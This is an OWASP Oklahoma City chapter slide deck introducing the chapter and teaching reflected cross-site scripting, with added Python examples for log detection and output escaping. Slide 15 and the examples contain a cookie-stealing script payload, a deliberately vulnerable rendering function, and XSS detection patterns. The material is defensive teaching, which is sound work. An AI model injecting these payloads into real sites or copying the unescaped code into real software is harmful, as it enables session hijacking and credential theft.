Oklahoma City.


1 Oklahoma City

2 Welcome! Thanks to our sponsors!
OWASP
RCB Bank
Crossroads Information Security

3 Joe Sullivan
Started in Infosec with a web hosting company in 1999
Started one of the first outsourced support companies for web hosting servers in 2000
Worked for an ecommerce company for 10 years in network security
Currently CISO for RCB Bank
1 to 1 Risk Control & Investigations – Owner/Lead Investigator
Consulting for Crossroads Information Security
SANS Mentor, SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling

4 Jim Thavisouk
Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer. He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including the Department of Defense and the Department of Energy, where he focused on vulnerability research against a variety of technologies. Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corps program.

5 Stacy Dunn
OWASP Oklahoma City Chapter Leader
Information Security Analyst, RCB Bank
Board Member of Super! BitCon, a local gaming convention
Curator and Founder at Oklahoma Artcade
Super nerd

6 Contact Information Joe Sullivan: Jim Thavisouk: Stacy Dunn:

7 Oklahoma City Chapter The official page is at: FaceBook YouTube MeetUp: <- Join us on Slack!

8 OWASP The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.

9 OWASP Top 10 The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

10 OWASP Top

11 Membership
Individual Members support OWASP at the $50 USD* level annually. There is also a 2 year membership for $95 USD* and Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page.
Membership is optional
Meetings are open to everyone
Guests are welcome
Memberships help fund our chapter

12 Meetings
Web Application Security
Web Application Development
Presentations
Labs
Networking
Round Tables
Food

13 The Future
Conferences (IWS Coming Up)
Speakers
Presentations
News
Challenge Coins
Promo Materials
Volunteers are welcome!

14 Speaking of Presentations
Cross Site Scripting
XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications
Better described as a code reflection attack
How this works: an attacker crafts a URL with a script in it
The script in the URL is sent to the server as input
When the user accesses the URL, the server reflects back the script contained in the URL
The user's browser processes the script and performs whatever action the script was set to run

15 Cross Site Scripting Attack Scenario
HTML without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
Attacker modifies the CC parameter to:
'><script>document.location= ' foo='+document.cookie</script>'.
This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.

16 More Cross Site Scripting Attacks
Port scanning your internal network using XSS attacks (
Attacking log viewers and user interfaces with XSS
Using the Browser Exploitation Framework (BeEF) to attack browsers
Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more
Good for getting a foothold on a network

17 Detecting Cross Site Scripting Attacks
This is a noisy attack
Generates logs
SIEM can detect attacks, but may miss obfuscation techniques
IPS can alert to XSS attacks
IDS can alert to XSS attacks
Web application firewall
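The slide notes that a SIEM can catch these requests but may miss obfuscated ones. The script below is an added example (not the chapter's or OWASP's code) of the detection logic a SIEM rule or a log-review script would apply: it pulls the request target out of combined-format access log lines, URL-decodes it repeatedly so that double-encoded payloads are not missed, and reports which indicators fired. The log lines are constructed for the example and represent no real traffic.

```python
"""Flag likely reflected-XSS probes in web server access logs.

Added example for this transcript, not the chapter's own code. It assumes
Combined Log Format lines; the sample lines below are constructed.
"""
import re
from urllib.parse import unquote

# Constructed sample lines (combined log format); none are real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2019:10:01:02 -0600] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2019:10:01:07 -0600] "GET /search?q=<script>alert(1)</script> HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2019:10:01:09 -0600] "GET /search?q=%3Cscript%3Edocument.location%3D'foo%3D'%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2019:10:01:11 -0600] "GET /profile?name=%253Cimg%20src%3Dx%20onerror%3Dalert(1)%253E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2019:10:02:00 -0600] "GET /help?topic=javascript%20basics HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Extracts the method and request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicator patterns, matched against the fully decoded request target.
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("js_uri", re.compile(r"javascript\s*:", re.I)),
    ("cookie_access", re.compile(r"document\.cookie", re.I)),
]


def fully_decode(target, max_rounds=3):
    """URL-decode repeatedly so a double-encoded '<' (%253C) is still caught.

    max_rounds bounds the loop so a hostile input cannot make it spin."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_line(line):
    """Return the names of the indicators that fire on one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    decoded = fully_decode(m.group("target"))
    return [name for name, pat in XSS_PATTERNS if pat.search(decoded)]


def scan_log(text):
    """Return (line_number, client_ip, indicators) for each suspicious line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        indicators = scan_line(line)
        if indicators:
            hits.append((n, line.split(" ", 1)[0], indicators))
    return hits


if __name__ == "__main__":
    for n, ip, indicators in scan_log(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(indicators)}")
```

Line 5 of the sample ("javascript basics") is deliberately benign: the `js_uri` pattern requires the colon, which is what keeps a search for a programming topic from raising an alert. A real rule set would also look at POST bodies and at request headers such as Referer and User-Agent, which are reflected by many log viewers; that is the point of the "attacking log viewers" bullet on the previous slide.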

18 Preventing Cross Site Scripting
Filter out meta characters from requests – do this on the server side, and not the client side
Microsoft offers a free anti-XSS library
Use frameworks that automatically escape XSS by design, such as the latest Ruby on Rails or React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered.
Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.
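The following is an added example (not the chapter's or OWASP's code) that ties the attack scenario on slide 15 to the escaping advice on slide 18. The vulnerable Java line from the scenario is re-expressed in Python with the request parameters passed in as a plain dict, so no web framework is assumed; the attacker payload is constructed for the example and carries no real URL. `render_unsafe` reproduces the defect, `render_safe` escapes for the HTML attribute context, and the two small helpers show that the same value needs a different encoder when it lands in a JavaScript string or a URL query, which is the "based on the context" point of the slide.

```python
"""Reflected XSS: the unescaped rendering from the attack scenario beside a
context-aware escaped version.

Added example for this transcript, not the chapter's own code. Request
parameters arrive as a dict; the payload below is constructed.
"""
import html
import json
from urllib.parse import quote

# Constructed attacker value, modelled on the slide-15 scenario (no real URL).
PAYLOAD = "'><script>document.location='foo='+document.cookie</script>'"


def render_unsafe(params):
    """Mirrors the vulnerable snippet: the CC parameter is concatenated
    straight into a single-quoted HTML attribute value."""
    return ("<input name='creditcard' type='TEXT' value='"
            + params.get("CC", "") + "'>")


def render_safe(params):
    """Same markup, but the value is escaped for the HTML attribute context.

    html.escape(..., quote=True) turns & < > " ' into entities, so the
    attacker's quote cannot close the attribute and < cannot open a tag."""
    return ("<input name='creditcard' type='TEXT' value='"
            + html.escape(params.get("CC", ""), quote=True) + "'>")


def to_js_string_literal(value):
    """Encoder for the JavaScript-string context: json.dumps yields a quoted,
    backslash-escaped literal; '</' is also broken up so the value can never
    terminate an enclosing <script> block."""
    return json.dumps(value).replace("</", "<\\/")


def to_url_query_value(value):
    """Encoder for the URL context: percent-encode everything, including
    the characters that are safe in an HTML attribute."""
    return quote(value, safe="")


def demo():
    """Render the attacker value both ways and return the two results."""
    params = {"CC": PAYLOAD}
    return {"unsafe": render_unsafe(params), "safe": render_safe(params)}


if __name__ == "__main__":
    out = demo()
    print("UNSAFE:", out["unsafe"])
    print("SAFE:  ", out["safe"])
```

In the unsafe output the attacker's leading `'>` closes the input tag and the script that follows is live markup; in the safe output the whole value stays inside the attribute as text. Note that escaping the attribute would not be enough if the same value were later written into an inline script or a redirect URL, which is why each output context gets its own encoder.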

19 Preventing Cross Site Scripting
Run web application penetration tests regularly
Test when changes are implemented to the web application
Test when new attacks come out
Work with your web application developer on testing and remediation

20 Discussion
What would you like to get out of our meetings?
Web Application Security
Vulnerability Testing and Remediation
Development
Security Operations
Penetration Testing
Incident Response
Defending Web Applications

